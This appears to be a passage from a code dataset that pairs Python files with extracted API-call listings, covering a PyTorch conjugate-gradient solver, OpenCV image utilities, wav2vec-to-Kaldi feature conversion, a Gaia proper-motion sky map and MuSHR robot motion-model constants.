@staticmethod
def backward(ctx, grad_output):
beta, xprime, z = ctx.saved_tensors
b = grad_output.unsqueeze(0).numpy().ravel()
old=time.time()
grad = torch.from_numpy(cg(ctx.H, b,tol=1e-3, x0=b)[0]).reshape(grad_output.shape)
print('backward cg',time.time()-old)
gz = gbeta = None
if ctx.needs_input_grad[0]:
gz = beta * ctx.G(grad.unsqueeze(0))
if ctx.needs_input_grad[2]:
gbeta = (-ctx.GH(ctx.G(xprime.unsqueeze(0)) - z.unsqueeze(0)) * grad).sum().real
return gz, None, gbeta, None, None, None, None, None
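# Note: in effect, forward() solves the regularised normal equations
#   (A^H A + beta * G^H G) x = A^H y + beta * G^H z
# with scipy's conjugate-gradient solver, and backward() reuses the same operator H,
# applying H^{-1} to grad_output to propagate gradients through the solve.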
|
[
"numpy.prod",
"scipy.sparse.linalg.cg",
"time.time",
"torch.from_numpy"
] |
[((1002, 1028), 'scipy.sparse.linalg.cg', 'cg', (['H', 'b'], {'tol': '(0.001)', 'x0': 'x0'}), '(H, b, tol=0.001, x0=x0)\n', (1004, 1028), False, 'from scipy.sparse.linalg import LinearOperator, cg\n'), ((1149, 1173), 'torch.from_numpy', 'torch.from_numpy', (['xprime'], {}), '(xprime)\n', (1165, 1173), False, 'import torch\n'), ((1421, 1432), 'time.time', 'time.time', ([], {}), '()\n', (1430, 1432), False, 'import time\n'), ((1552, 1563), 'time.time', 'time.time', ([], {}), '()\n', (1561, 1563), False, 'import time\n'), ((791, 807), 'numpy.prod', 'np.prod', (['b.shape'], {}), '(b.shape)\n', (798, 807), True, 'import numpy as np\n'), ((809, 825), 'numpy.prod', 'np.prod', (['b.shape'], {}), '(b.shape)\n', (816, 825), True, 'import numpy as np\n'), ((1465, 1494), 'scipy.sparse.linalg.cg', 'cg', (['ctx.H', 'b'], {'tol': '(0.001)', 'x0': 'b'}), '(ctx.H, b, tol=0.001, x0=b)\n', (1467, 1494), False, 'from scipy.sparse.linalg import LinearOperator, cg\n'), ((908, 927), 'torch.from_numpy', 'torch.from_numpy', (['x'], {}), '(x)\n', (924, 927), False, 'import torch\n')]
|
#! /usr/bin/env python
# Copyright (c) 2018 - 2019 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from __future__ import print_function
import os
import cv2
import numpy as np
from pythutils.fileutils import get_ext
from pythutils.mathutils import closenr, sort_points
def check_media(source, internal=False):
"""Runs some basic checks on a mediafile or stream"""
ext = get_ext(str(source))
ftype = None
if ext in [".mov",".mp4",".avi"]:
ftype = "vid"
if ext in [".jpg", ".png", ".jpeg", ".bmp"]:
ftype = "img"
if type(source) == int:
ftype = "stream"
if ftype == None:
print("File neither video or image file..")
return False
if ftype == "img" or ftype == "vid":
filedir = os.path.dirname(source)
if filedir != "":
if not os.path.isdir(filedir):
print("File directory does not exist..")
return False
if not os.path.isfile(source):
print("File does not exist..")
return False
if ftype == "vid" or ftype == "stream":
cap = cv2.VideoCapture(source)
flag, frame = cap.read()
if not flag:
print("Video source opened but failed to read images..")
return False
if not internal:
print("Mediafile okay.. ", end = "")
return True
def getimg(mediafile):
"""Acquires a numpy array from a video or image"""
try:
cap = cv2.VideoCapture(mediafile)
_, img = cap.read()
except:
img = cv2.imread(mediafile)
return img
def get_vid_params(mediafile):
"""Gets video parameters from file or video instance"""
if type(mediafile) is str:
if get_ext(mediafile) not in [".mov",".mp4",".avi"]:
raise TypeError("File not a video..")
mediafile = cv2.VideoCapture(mediafile)
if not mediafile.read()[0]:
raise RuntimeError("Video could not be read..")
fps = int(mediafile.get(cv2.CAP_PROP_FPS))
width = int(mediafile.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(mediafile.get(cv2.CAP_PROP_FRAME_HEIGHT))
fcount = int(mediafile.get(cv2.CAP_PROP_FRAME_COUNT))
return fps, width, height, fcount
def videowriter(filein, w, h, fps, resizeval = 1):
"""Creates a vidout instance using the opencv VideoWriter class"""
ext = get_ext(filein)
fileout = filein[:-len(ext)]+".mp4" if ext!="" else filein+".mp4"
viddims = (w, h) if resizeval == 1 else (int(w*resizeval), int(h*resizeval))
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
vidout = cv2.VideoWriter(fileout, fourcc, fps, viddims)
return vidout
def safe_framecount(vidfile):
"""Saves video frame counter that counts frame-by-frame"""
cap = cv2.VideoCapture(vidfile)
vidlength = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
count = 0
while True:
ret, frame = cap.read()
if not ret:
break
count += 1
print("video had", vidlength-count, "non-existing frames.. ", end = "")
return count
def crop(image, pt1, pt2=None):
"""Crops image based on based on top left and bottom right corner"""
if pt2 == None:
pt2 = pt1[1]
pt1 = pt1[0]
cropped = image[pt1[1]:pt2[1], pt1[0]:pt2[0]]
return cropped
def fourpt_transform(image, pts):
"""
Perspective transform a section of an image based on four coordinates
to obtain a top-down view
"""
rect = sort_points(pts)
(tl, tr, br, bl) = rect
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxHeight = max(int(heightA), int(heightB))
dst = np.array([[0, 0], [maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]], dtype = "float32")
M = cv2.getPerspectiveTransform(rect, dst)
warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))
return warped
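# Usage sketch (illustrative corner coordinates):
#   pts = np.array([(10, 12), (410, 25), (400, 300), (15, 310)], dtype="float32")
#   topdown = fourpt_transform(img, pts)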
def checkroi(roi, resolution):
"""Make sure roi coordinates are within resolution"""
x1 = max(roi[0][0],1)
y1 = max(roi[0][1],1)
x2 = min(roi[1][0],resolution[0])
y2 = min(roi[1][1],resolution[1])
return ((x1,y1),(x2,y2))
def zoom_to_roi(zoom, resolution):
"""Gets region of interest coordinates from x,y,w,h zoom parameters"""
x1 = int(zoom[0] * resolution[0])
x2 = int((zoom[0]+zoom[2]) * resolution[0])
y1 = int(zoom[1] * resolution[1])
y2 = int((zoom[1]+zoom[3]) * resolution[1])
return ((x1,y1),(x2,y2))
def roi_to_zoom(roi, resolution):
"""Gets x,y,w,h zoom parameters from region of interest coordinates"""
((x1,y1),(x2,y2)) = roi
z0 = round(x1 / resolution[0],2)
z1 = round(y1 / resolution[1],2)
z2 = round((x2-x1) / resolution[0],2)
z3 = round((y2-y1) / resolution[1],2)
return (z0, z1, z2, z3)
def picamconv(resolution, maxres = (1632, 1232)):
"""Adapts video resolution to work with raspberry pi camera"""
width = min(closenr(resolution[0],32), maxres[0])
height = min(closenr(resolution[1],16), maxres[1])
return (width, height)
def fix_vidshape(res1,res2):
"""Compares two resolutions and get missing x and y coords"""
xmin,ymin = 0,0
xmult = (res2[0]/res1[0])
ymult = (res2[1]/res1[1])
if xmult > ymult:
xmin = int((res2[0]-(res1[0]*ymult))/2)
if ymult > xmult:
ymin = int((res2[0]-(res1[0]*xmult))/2)
return xmin, ymin
def newdims(img = None, resize = 1, dims = None):
"""Returns new dimensions of an image array based on resize value"""
if dims is None:
if img is None:
print("No img or dims provided..")
return
else:
dims = (img.shape[1],img.shape[0])
width = int(dims[0] * resize)
height = int(dims[1] * resize)
return (width, height)
def imgresize(img, resize = 1, dims = None, back = False):
"""
Returns resized image based on resizevalue or provided dimensions
Parameters
----------
img : numpy array
resize : float, default = 1
Multiplier for image size
dims : tuple, default = None
Dimensions of the to-be returned image
back : bool, default = False
If the inverse of the resize value should be used
"""
if dims is None:
resize = 1/resize if back else resize
dims = newdims(img, resize)
interpol = cv2.INTER_CUBIC if resize > 1 else cv2.INTER_AREA
img = cv2.resize(img, dims, interpolation = interpol)
return img
def add_transimg(bgimg, transimg, offsets):
"""
Adds a semi-transparent (4-channel) image to a 3-channel background
image. Images need to be arrays.
"""
h, w, c = transimg.shape
fix = np.zeros((h, w, 3), np.uint8)
a = transimg[:, :, 3] / 255 #alpha
o = offsets
fix[:,:,0] = (1.-a)*bgimg[o[1]:o[1]+h, o[0]:o[0]+w, 0]+a*transimg[:,:,0]
fix[:,:,1] = (1.-a)*bgimg[o[1]:o[1]+h, o[0]:o[0]+w, 1]+a*transimg[:,:,1]
fix[:,:,2] = (1.-a)*bgimg[o[1]:o[1]+h, o[0]:o[0]+w, 2]+a*transimg[:,:,2]
bgimg[o[1]:o[1]+h, o[0]:o[0]+w] = fix
return bgimg
|
[
"pythutils.fileutils.get_ext",
"pythutils.mathutils.sort_points",
"numpy.sqrt",
"cv2.getPerspectiveTransform",
"cv2.VideoWriter",
"os.path.isfile",
"numpy.array",
"cv2.warpPerspective",
"numpy.zeros",
"os.path.dirname",
"cv2.VideoCapture",
"cv2.VideoWriter_fourcc",
"os.path.isdir",
"cv2.resize",
"pythutils.mathutils.closenr",
"cv2.imread"
] |
[((2904, 2919), 'pythutils.fileutils.get_ext', 'get_ext', (['filein'], {}), '(filein)\n', (2911, 2919), False, 'from pythutils.fileutils import get_ext\n'), ((3084, 3115), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'mp4v'"], {}), "(*'mp4v')\n", (3106, 3115), False, 'import cv2\n'), ((3129, 3175), 'cv2.VideoWriter', 'cv2.VideoWriter', (['fileout', 'fourcc', 'fps', 'viddims'], {}), '(fileout, fourcc, fps, viddims)\n', (3144, 3175), False, 'import cv2\n'), ((3302, 3327), 'cv2.VideoCapture', 'cv2.VideoCapture', (['vidfile'], {}), '(vidfile)\n', (3318, 3327), False, 'import cv2\n'), ((4008, 4024), 'pythutils.mathutils.sort_points', 'sort_points', (['pts'], {}), '(pts)\n', (4019, 4024), False, 'from pythutils.mathutils import closenr, sort_points\n'), ((4067, 4119), 'numpy.sqrt', 'np.sqrt', (['((br[0] - bl[0]) ** 2 + (br[1] - bl[1]) ** 2)'], {}), '((br[0] - bl[0]) ** 2 + (br[1] - bl[1]) ** 2)\n', (4074, 4119), True, 'import numpy as np\n'), ((4137, 4189), 'numpy.sqrt', 'np.sqrt', (['((tr[0] - tl[0]) ** 2 + (tr[1] - tl[1]) ** 2)'], {}), '((tr[0] - tl[0]) ** 2 + (tr[1] - tl[1]) ** 2)\n', (4144, 4189), True, 'import numpy as np\n'), ((4254, 4306), 'numpy.sqrt', 'np.sqrt', (['((tr[0] - br[0]) ** 2 + (tr[1] - br[1]) ** 2)'], {}), '((tr[0] - br[0]) ** 2 + (tr[1] - br[1]) ** 2)\n', (4261, 4306), True, 'import numpy as np\n'), ((4325, 4377), 'numpy.sqrt', 'np.sqrt', (['((tl[0] - bl[0]) ** 2 + (tl[1] - bl[1]) ** 2)'], {}), '((tl[0] - bl[0]) ** 2 + (tl[1] - bl[1]) ** 2)\n', (4332, 4377), True, 'import numpy as np\n'), ((4441, 4551), 'numpy.array', 'np.array', (['[[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]]'], {'dtype': '"""float32"""'}), "([[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, \n maxHeight - 1]], dtype='float32')\n", (4449, 4551), True, 'import numpy as np\n'), ((4598, 4636), 'cv2.getPerspectiveTransform', 'cv2.getPerspectiveTransform', (['rect', 'dst'], {}), '(rect, dst)\n', (4625, 4636), False, 'import cv2\n'), ((4650, 4702), 'cv2.warpPerspective', 'cv2.warpPerspective', (['image', 'M', '(maxWidth, maxHeight)'], {}), '(image, M, (maxWidth, maxHeight))\n', (4669, 4702), False, 'import cv2\n'), ((7232, 7277), 'cv2.resize', 'cv2.resize', (['img', 'dims'], {'interpolation': 'interpol'}), '(img, dims, interpolation=interpol)\n', (7242, 7277), False, 'import cv2\n'), ((7508, 7537), 'numpy.zeros', 'np.zeros', (['(h, w, 3)', 'np.uint8'], {}), '((h, w, 3), np.uint8)\n', (7516, 7537), True, 'import numpy as np\n'), ((1307, 1330), 'os.path.dirname', 'os.path.dirname', (['source'], {}), '(source)\n', (1322, 1330), False, 'import os\n'), ((1652, 1676), 'cv2.VideoCapture', 'cv2.VideoCapture', (['source'], {}), '(source)\n', (1668, 1676), False, 'import cv2\n'), ((2014, 2041), 'cv2.VideoCapture', 'cv2.VideoCapture', (['mediafile'], {}), '(mediafile)\n', (2030, 2041), False, 'import cv2\n'), ((2391, 2418), 'cv2.VideoCapture', 'cv2.VideoCapture', (['mediafile'], {}), '(mediafile)\n', (2407, 2418), False, 'import cv2\n'), ((5754, 5780), 'pythutils.mathutils.closenr', 'closenr', (['resolution[0]', '(32)'], {}), '(resolution[0], 32)\n', (5761, 5780), False, 'from pythutils.mathutils import closenr, sort_points\n'), ((5809, 5835), 'pythutils.mathutils.closenr', 'closenr', (['resolution[1]', '(16)'], {}), '(resolution[1], 16)\n', (5816, 5835), False, 'from pythutils.mathutils import closenr, sort_points\n'), ((1501, 1523), 'os.path.isfile', 'os.path.isfile', (['source'], {}), '(source)\n', (1515, 1523), False, 'import os\n'), ((2096, 2117), 'cv2.imread', 
'cv2.imread', (['mediafile'], {}), '(mediafile)\n', (2106, 2117), False, 'import cv2\n'), ((2271, 2289), 'pythutils.fileutils.get_ext', 'get_ext', (['mediafile'], {}), '(mediafile)\n', (2278, 2289), False, 'from pythutils.fileutils import get_ext\n'), ((1376, 1398), 'os.path.isdir', 'os.path.isdir', (['filedir'], {}), '(filedir)\n', (1389, 1398), False, 'import os\n')]
|
import kaldi_io
import numpy as np
import os
def get_parser():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("w2v_dir", help="wav2vec feature and text directory")
parser.add_argument("tar_root", help="output data directory in kaldi's format")
parser.add_argument("split", help="name of the subset")
parser.add_argument("--label", default="", help="if specified, copy labels too")
return parser
def main():
parser = get_parser()
args = parser.parse_args()
tar_dir = os.path.join(args.tar_root, args.split)
os.makedirs(tar_dir, exist_ok=True)
lengths_path = os.path.join(args.w2v_dir, f"{args.split}.lengths")
with open(lengths_path) as f:
lengths = [int(line.rstrip()) for line in f]
offsets = [0] + np.cumsum(lengths[:-1]).tolist()
feats = np.load(
os.path.join(args.w2v_dir, f"{args.split}.npy"),
mmap_mode="r"
)
assert feats.shape[0] == sum(lengths), \
f"lengths mismatch {feats.shape[0]} != {sum(lengths)}"
ark_path = os.path.join(tar_dir, "feats.ark")
scp_path = os.path.join(tar_dir, "feats.scp")
wspec = f"ark:| copy-feats --compress=true ark:- ark,scp:{ark_path},{scp_path}"
with kaldi_io.open_or_fd(wspec, "wb") as f:
for idx, (offset, length) in enumerate(zip(offsets, lengths)):
feat = feats[offset:offset+length]
kaldi_io.write_mat(f, feat, key=f"utt{idx:010d}")
u2s_path = os.path.join(tar_dir, "utt2spk")
s2u_path = os.path.join(tar_dir, "spk2utt")
with open(u2s_path, "w") as f_u2s, open(s2u_path, "w") as f_s2u:
for idx in range(len(lengths)):
f_u2s.write(f"utt{idx:010d} utt{idx:010d}\n")
f_s2u.write(f"utt{idx:010d} utt{idx:010d}\n")
if bool(args.label):
lab_path = os.path.join(args.w2v_dir, f"{args.split}.{args.label}")
txt_path = os.path.join(tar_dir, "text")
with open(lab_path) as f_lab, open(txt_path, "w") as f_txt:
for idx, line in enumerate(f_lab):
f_txt.write(f"utt{idx:010d} {line}")
if __name__ == "__main__":
main()
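# Example invocation (hypothetical script name and paths):
#   python dump_w2v_to_kaldi.py /data/w2v_feats data/kaldi train --label ltr
# writes feats.ark/feats.scp, utt2spk and spk2utt (and text if --label is given) under data/kaldi/train.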
|
[
"os.makedirs",
"argparse.ArgumentParser",
"os.path.join",
"kaldi_io.open_or_fd",
"numpy.cumsum",
"kaldi_io.write_mat"
] |
[((105, 130), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (128, 130), False, 'import argparse\n'), ((552, 591), 'os.path.join', 'os.path.join', (['args.tar_root', 'args.split'], {}), '(args.tar_root, args.split)\n', (564, 591), False, 'import os\n'), ((597, 632), 'os.makedirs', 'os.makedirs', (['tar_dir'], {'exist_ok': '(True)'}), '(tar_dir, exist_ok=True)\n', (608, 632), False, 'import os\n'), ((655, 706), 'os.path.join', 'os.path.join', (['args.w2v_dir', 'f"""{args.split}.lengths"""'], {}), "(args.w2v_dir, f'{args.split}.lengths')\n", (667, 706), False, 'import os\n'), ((1092, 1126), 'os.path.join', 'os.path.join', (['tar_dir', '"""feats.ark"""'], {}), "(tar_dir, 'feats.ark')\n", (1104, 1126), False, 'import os\n'), ((1143, 1177), 'os.path.join', 'os.path.join', (['tar_dir', '"""feats.scp"""'], {}), "(tar_dir, 'feats.scp')\n", (1155, 1177), False, 'import os\n'), ((1513, 1545), 'os.path.join', 'os.path.join', (['tar_dir', '"""utt2spk"""'], {}), "(tar_dir, 'utt2spk')\n", (1525, 1545), False, 'import os\n'), ((1562, 1594), 'os.path.join', 'os.path.join', (['tar_dir', '"""spk2utt"""'], {}), "(tar_dir, 'spk2utt')\n", (1574, 1594), False, 'import os\n'), ((885, 932), 'os.path.join', 'os.path.join', (['args.w2v_dir', 'f"""{args.split}.npy"""'], {}), "(args.w2v_dir, f'{args.split}.npy')\n", (897, 932), False, 'import os\n'), ((1273, 1305), 'kaldi_io.open_or_fd', 'kaldi_io.open_or_fd', (['wspec', '"""wb"""'], {}), "(wspec, 'wb')\n", (1292, 1305), False, 'import kaldi_io\n'), ((1872, 1928), 'os.path.join', 'os.path.join', (['args.w2v_dir', 'f"""{args.split}.{args.label}"""'], {}), "(args.w2v_dir, f'{args.split}.{args.label}')\n", (1884, 1928), False, 'import os\n'), ((1949, 1978), 'os.path.join', 'os.path.join', (['tar_dir', '"""text"""'], {}), "(tar_dir, 'text')\n", (1961, 1978), False, 'import os\n'), ((1445, 1494), 'kaldi_io.write_mat', 'kaldi_io.write_mat', (['f', 'feat'], {'key': 'f"""utt{idx:010d}"""'}), "(f, feat, key=f'utt{idx:010d}')\n", (1463, 1494), False, 'import kaldi_io\n'), ((821, 844), 'numpy.cumsum', 'np.cumsum', (['lengths[:-1]'], {}), '(lengths[:-1])\n', (830, 844), True, 'import numpy as np\n')]
|
"""
Plot an all-sky average proper motion map, using statistics downloaded from the Gaia archive with a query similar to the
following:
select
gaia_healpix_index(5, source_id) as healpix_5,
avg(pmra) as avg_pmra,
avg(pmdec) as avg_pmdec
from gaiaedr3.gaia_source
where parallax_over_error>=10
and parallax*parallax - 2*parallax - parallax_error*parallax_error < -1
group by healpix_5
<NAME> Oct 2020 - Dec 2020
"""
import argparse
import astropy.units as u
import astropy_healpix.healpy as hp
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import numpy as np
from astropy.coordinates import ICRS, Galactic
from astropy.table import Table
from matplotlib import cm
from matplotlib.gridspec import GridSpec
from matplotlib.patches import ArrowStyle
def make_plot(args):
"""
Take the steps to make the plot.
Parameters
----------
args: dict
Command line arguments
Returns
-------
Nothing
"""
infile = './data/' + args['inputFile']
basename = 'PMmap-' + args['inputFile'].split('.')[0]
default_proj = ccrs.PlateCarree()
sky_proj = ccrs.Mollweide()
backgr = plt.imread('../star-trail-animation/sky-images/GaiaSky-colour-2k.png')
nside = hp.order2nside(args['hplevel'])
hpcol = 'healpix_{0}'.format(args['hplevel'])
edr3data = Table.read(infile)
alpha, delta = hp.pix2ang(nside, edr3data[hpcol], lonlat=True, nest=True)
pmra = edr3data['avg_pmra']
pmdec = edr3data['avg_pmdec']
icrs = ICRS(ra=alpha * u.degree, dec=delta * u.degree, pm_ra_cosdec=pmra * u.mas / u.yr,
pm_dec=pmdec * u.mas / u.yr)
galactic = icrs.transform_to(Galactic)
pmtot = np.sqrt(galactic.pm_l_cosb.value ** 2 + galactic.pm_b.value ** 2)
fig = plt.figure(figsize=(16, 9), dpi=120, frameon=False, tight_layout={'pad': 0.01})
gs = GridSpec(1, 1, figure=fig)
ax = fig.add_subplot(gs[0, 0], projection=sky_proj)
ax.imshow(np.fliplr(backgr), transform=default_proj, zorder=-1, origin='upper')
pmcmap = cm.viridis
veccolor = plt.cm.get_cmap('tab10').colors[9]
linecolor = plt.cm.get_cmap('tab10').colors[9]
if args['quiver']:
vscale = np.median(pmtot) / 10
ax.quiver(galactic.l.value, galactic.b.value, galactic.pm_l_cosb.value, galactic.pm_b.value,
transform=default_proj, angles='xy', scale=vscale, scale_units='dots', color=veccolor,
headwidth=1, headlength=3, headaxislength=2.5)
else:
if args['colourstreams']:
ax.streamplot(galactic.l.value, galactic.b.value, galactic.pm_l_cosb.value, galactic.pm_b.value,
transform=default_proj, linewidth=2.0, density=2, color=pmtot, cmap=pmcmap, maxlength=0.5,
arrowsize=1, arrowstyle=ArrowStyle.Fancy(head_length=1.0, head_width=.4, tail_width=.4))
elif args['lwcode'] > 0:
ax.streamplot(galactic.l.value, galactic.b.value, galactic.pm_l_cosb.value, galactic.pm_b.value,
transform=default_proj, linewidth=args['lwcode'] * pmtot / np.median(pmtot), density=2,
color=linecolor,
maxlength=0.5, arrowsize=1, arrowstyle=ArrowStyle.Fancy(head_length=1.0, head_width=.4,
tail_width=.4))
else:
ax.streamplot(galactic.l.value, galactic.b.value, galactic.pm_l_cosb.value, galactic.pm_b.value,
transform=default_proj, linewidth=1.5, density=2, color=linecolor, maxlength=0.5, arrowsize=1,
arrowstyle=ArrowStyle.Fancy(head_length=1.0, head_width=.4, tail_width=.4))
ax.invert_xaxis()
if args['pdfOutput']:
plt.savefig(basename + '.pdf')
elif args['pngOutput']:
plt.savefig(basename + '.png')
else:
plt.show()
def parse_command_line_arguments():
"""
Set up command line parsing.
"""
parser = argparse.ArgumentParser("Produce all-sky proper motion map.")
parser.add_argument('inputFile', type=str, help="""VOT file with proper motion stats by Healpix.""")
parser.add_argument('hplevel', type=int, nargs='?', default=4, help="""Healpix level of input table.""")
parser.add_argument('--vectors', action="store_true", dest="quiver", help="Plot vectors instead of streamlines")
parser.add_argument('--colourcode', action='store_true', dest='colourstreams', help="""Plot streamlines colour coded
by magnitude of proper motion""")
parser.add_argument('--lwcode', type=float, default=0.0, help="""Plot streamlines with the width indicating the
magnitude of proper motion. Scale the widths by the factor provided""")
parser.add_argument("-p", action="store_true", dest="pdfOutput", help="Make PDF plot")
parser.add_argument("-b", action="store_true", dest="pngOutput", help="Make PNG plot")
args = vars(parser.parse_args())
return args
if __name__ == '__main__':
cmdargs = parse_command_line_arguments()
make_plot(cmdargs)
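# Example invocation (hypothetical script and input file name, produced by the query in the module docstring):
#   python pmmap.py pm_stats_hpx5.vot 5 --colourcode -p
# reads ./data/pm_stats_hpx5.vot and saves PMmap-pm_stats_hpx5.pdf.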
|
[
"numpy.median",
"numpy.sqrt",
"matplotlib.pyplot.savefig",
"argparse.ArgumentParser",
"matplotlib.pyplot.show",
"numpy.fliplr",
"cartopy.crs.Mollweide",
"matplotlib.pyplot.imread",
"cartopy.crs.PlateCarree",
"matplotlib.patches.ArrowStyle.Fancy",
"matplotlib.pyplot.figure",
"matplotlib.gridspec.GridSpec",
"astropy.coordinates.ICRS",
"matplotlib.pyplot.cm.get_cmap",
"astropy_healpix.healpy.pix2ang",
"astropy_healpix.healpy.order2nside",
"astropy.table.Table.read"
] |
[((1082, 1100), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (1098, 1100), True, 'import cartopy.crs as ccrs\n'), ((1116, 1132), 'cartopy.crs.Mollweide', 'ccrs.Mollweide', ([], {}), '()\n', (1130, 1132), True, 'import cartopy.crs as ccrs\n'), ((1147, 1217), 'matplotlib.pyplot.imread', 'plt.imread', (['"""../star-trail-animation/sky-images/GaiaSky-colour-2k.png"""'], {}), "('../star-trail-animation/sky-images/GaiaSky-colour-2k.png')\n", (1157, 1217), True, 'import matplotlib.pyplot as plt\n'), ((1231, 1262), 'astropy_healpix.healpy.order2nside', 'hp.order2nside', (["args['hplevel']"], {}), "(args['hplevel'])\n", (1245, 1262), True, 'import astropy_healpix.healpy as hp\n'), ((1328, 1346), 'astropy.table.Table.read', 'Table.read', (['infile'], {}), '(infile)\n', (1338, 1346), False, 'from astropy.table import Table\n'), ((1367, 1425), 'astropy_healpix.healpy.pix2ang', 'hp.pix2ang', (['nside', 'edr3data[hpcol]'], {'lonlat': '(True)', 'nest': '(True)'}), '(nside, edr3data[hpcol], lonlat=True, nest=True)\n', (1377, 1425), True, 'import astropy_healpix.healpy as hp\n'), ((1504, 1618), 'astropy.coordinates.ICRS', 'ICRS', ([], {'ra': '(alpha * u.degree)', 'dec': '(delta * u.degree)', 'pm_ra_cosdec': '(pmra * u.mas / u.yr)', 'pm_dec': '(pmdec * u.mas / u.yr)'}), '(ra=alpha * u.degree, dec=delta * u.degree, pm_ra_cosdec=pmra * u.mas /\n u.yr, pm_dec=pmdec * u.mas / u.yr)\n', (1508, 1618), False, 'from astropy.coordinates import ICRS, Galactic\n'), ((1686, 1751), 'numpy.sqrt', 'np.sqrt', (['(galactic.pm_l_cosb.value ** 2 + galactic.pm_b.value ** 2)'], {}), '(galactic.pm_l_cosb.value ** 2 + galactic.pm_b.value ** 2)\n', (1693, 1751), True, 'import numpy as np\n'), ((1763, 1842), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(16, 9)', 'dpi': '(120)', 'frameon': '(False)', 'tight_layout': "{'pad': 0.01}"}), "(figsize=(16, 9), dpi=120, frameon=False, tight_layout={'pad': 0.01})\n", (1773, 1842), True, 'import matplotlib.pyplot as plt\n'), ((1852, 1878), 'matplotlib.gridspec.GridSpec', 'GridSpec', (['(1)', '(1)'], {'figure': 'fig'}), '(1, 1, figure=fig)\n', (1860, 1878), False, 'from matplotlib.gridspec import GridSpec\n'), ((4004, 4065), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Produce all-sky proper motion map."""'], {}), "('Produce all-sky proper motion map.')\n", (4027, 4065), False, 'import argparse\n'), ((1949, 1966), 'numpy.fliplr', 'np.fliplr', (['backgr'], {}), '(backgr)\n', (1958, 1966), True, 'import numpy as np\n'), ((3777, 3807), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(basename + '.pdf')"], {}), "(basename + '.pdf')\n", (3788, 3807), True, 'import matplotlib.pyplot as plt\n'), ((2058, 2082), 'matplotlib.pyplot.cm.get_cmap', 'plt.cm.get_cmap', (['"""tab10"""'], {}), "('tab10')\n", (2073, 2082), True, 'import matplotlib.pyplot as plt\n'), ((2109, 2133), 'matplotlib.pyplot.cm.get_cmap', 'plt.cm.get_cmap', (['"""tab10"""'], {}), "('tab10')\n", (2124, 2133), True, 'import matplotlib.pyplot as plt\n'), ((2185, 2201), 'numpy.median', 'np.median', (['pmtot'], {}), '(pmtot)\n', (2194, 2201), True, 'import numpy as np\n'), ((3844, 3874), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(basename + '.png')"], {}), "(basename + '.png')\n", (3855, 3874), True, 'import matplotlib.pyplot as plt\n'), ((3893, 3903), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3901, 3903), True, 'import matplotlib.pyplot as plt\n'), ((2798, 2863), 'matplotlib.patches.ArrowStyle.Fancy', 'ArrowStyle.Fancy', ([], {'head_length': '(1.0)', 'head_width': '(0.4)', 
'tail_width': '(0.4)'}), '(head_length=1.0, head_width=0.4, tail_width=0.4)\n', (2814, 2863), False, 'from matplotlib.patches import ArrowStyle\n'), ((3227, 3292), 'matplotlib.patches.ArrowStyle.Fancy', 'ArrowStyle.Fancy', ([], {'head_length': '(1.0)', 'head_width': '(0.4)', 'tail_width': '(0.4)'}), '(head_length=1.0, head_width=0.4, tail_width=0.4)\n', (3243, 3292), False, 'from matplotlib.patches import ArrowStyle\n'), ((3655, 3720), 'matplotlib.patches.ArrowStyle.Fancy', 'ArrowStyle.Fancy', ([], {'head_length': '(1.0)', 'head_width': '(0.4)', 'tail_width': '(0.4)'}), '(head_length=1.0, head_width=0.4, tail_width=0.4)\n', (3671, 3720), False, 'from matplotlib.patches import ArrowStyle\n'), ((3090, 3106), 'numpy.median', 'np.median', (['pmtot'], {}), '(pmtot)\n', (3099, 3106), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
# Copyright (c) 2019, The Personal Robotics Lab, The MuSHR Team, The Contributors of MuSHR
# License: BSD 3-Clause. See LICENSE.md file in root directory.
from threading import Lock
import numpy as np
import rospy
from std_msgs.msg import Float64
from vesc_msgs.msg import VescStateStamped
# Tune these Values!
KM_V_NOISE = 0.4 # Kinematic car velocity noise std dev
KM_DELTA_NOISE = 0.2 # Kinematic car delta noise std dev
KM_X_FIX_NOISE = 3e-2 # Kinematic car x position constant noise std dev
KM_Y_FIX_NOISE = 3e-2 # Kinematic car y position constant noise std dev
KM_THETA_FIX_NOISE = 1e-1 # Kinematic car theta constant noise std dev
# #Tune these Values!
# KM_V_NOISE = 0.01 # Kinematic car velocity noise std dev
# KM_DELTA_NOISE = 0.06 # Kinematic car delta noise std dev
# KM_X_FIX_NOISE = 3e-2 # Kinematic car x position constant noise std dev
# KM_Y_FIX_NOISE = 1e-3 # Kinematic car y position constant noise std dev
# KM_THETA_FIX_NOISE = 1e-2 # Kinematic car theta constant noise std dev
# #Tune these Values!
# KM_V_NOISE = 0.015 # Kinematic car velocity noise std dev
# KM_DELTA_NOISE = 0.065 # Kinematic car delta noise std dev
